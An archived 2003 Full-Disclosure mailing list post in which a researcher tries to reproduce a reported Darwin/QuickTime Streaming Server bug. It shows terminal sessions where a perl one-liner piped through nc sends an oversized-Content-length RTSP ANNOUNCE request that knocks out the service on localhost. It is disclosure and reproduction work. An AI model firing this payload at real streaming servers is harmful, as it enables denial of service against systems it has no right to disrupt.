lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <OF9B18B174.B4693100-ON85256D2F.0050407C@hq.rapid7.com>
Date: Fri, 23 May 2003 10:38:52 -0400
From: "Joe Testa" <Joe_Testa@...id7.com>
To: full-disclosure@...ts.netsys.com, mordred@...ail.com,
   bugtraq@...urityfocus.com
Subject: Re: QuickTime/Darwin Streaming Server security issues


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Greetings.

    I'm having trouble reproducing this vulnerability as well.  See below:


[jdog@...derland jdog]$ cat /etc/redhat-release
jdog's Super Tricked-out Red Hat Linux release 8.0 (Psyche)
[jdog@...derland jdog]$ echo -ne "OPTIONS * RTSP/1.0\nCseq: 1\n\n" | nc
localhost 554
RTSP/1.0 200 OK
Server: DSS/4.1.3 (Build/412.45; Platform/Linux)
Cseq: 1
Public: DESCRIBE, SETUP, TEARDOWN, PLAY, PAUSE, ANNOUNCE, SET_PARAMETER, RECORD


    It takes a few tries against *localhost* to notice the adverse effects:


[jdog@...derland jdog]$ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-
length:4294967295\n\n", "A"x8192' | nc -v localhost 554
localhost.localdomain [127.0.0.1] 554 (rtsp) open
[jdog@...derland jdog]$ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-
length:4294967295\n\n", "A"x8192' | nc -v localhost 554
localhost.localdomain [127.0.0.1] 554 (rtsp) open
[jdog@...derland jdog]$ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-
length:4294967295\n\n", "A"x8192' | nc -v localhost 554
localhost.localdomain [127.0.0.1] 554 (rtsp) open
[jdog@...derland jdog]$ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-
length:4294967295\n\n", "A"x8192' | nc -v localhost 554
localhost.localdomain [127.0.0.1] 554 (rtsp) open
[jdog@...derland jdog]$ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-
length:4294967295\n\n", "A"x8192' | nc -v localhost 554
localhost.localdomain [127.0.0.1] 554 (rtsp) : Connection refused


    However, the port always remains open when I use the external IP address,
no matter how many times I run the example exploit:


[jdog@...derland jdog]$ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-
length:4294967295\n\n", "A"x8192' | nc -v 192.168.x.x 554
192.168.x.x: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.x.x] 554 (rtsp) open
RTSP/1.0 401 Unauthorized
Server: DSS/4.1.3 (Build/412.45; Platform/Linux)
Cseq:
WWW-Authenticate: Digest realm="Streaming Server", nonce="a4a1975c2b5c8e3fa
557e1f3d486e5a1"

RTSP/1.0 400 Bad Request
Server: DSS/4.1.3 (Build/412.45; Platform/Linux)
Cseq:
Connection: Close

 punt!
[jdog@...derland jdog]$ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-
length:4294967295\n\n", "A"x8192' | nc -v 192.168.x.x 554
192.168.x.x: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.x.x] 554 (rtsp) open
RTSP/1.0 401 Unauthorized
Server: DSS/4.1.3 (Build/412.45; Platform/Linux)
Cseq:
WWW-Authenticate: Digest realm="Streaming Server", nonce="eb9cc1d1fb4674ad
f37cef319d38fc4d"

RTSP/1.0 400 Bad Request
Server: DSS/4.1.3 (Build/412.45; Platform/Linux)
Cseq:
Connection: Close

 punt!
[jdog@...derland jdog]$


    So, given the exploit code given in the original advisory for this issue,
it appears as though Quicktime Streaming Server is only vulnerable from
localhost.
    Perhaps this was the trouble Apple was having?  Or am I missing something
also?

    - Joe

P.S.  Read my blog!:  http://curseddestiny.blogspot.com/


    - Joe Testa, Rapid 7, Inc.
    http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xC6E50EDC
    3691 6B1D 4813 DEA2 D18C  202D 0563 DB41 C6E5 0EDC


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (OpenVMS)

iD8DBQE+ziz1BWPbQcblDtwRAoDPAKDJ/Mmwi1QOJvaGgcVN0h1XeywkQQCglgs2
MzpK6ok04PtnuRscEXlVe3M=
=H0M8
-----END PGP SIGNATURE-----


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ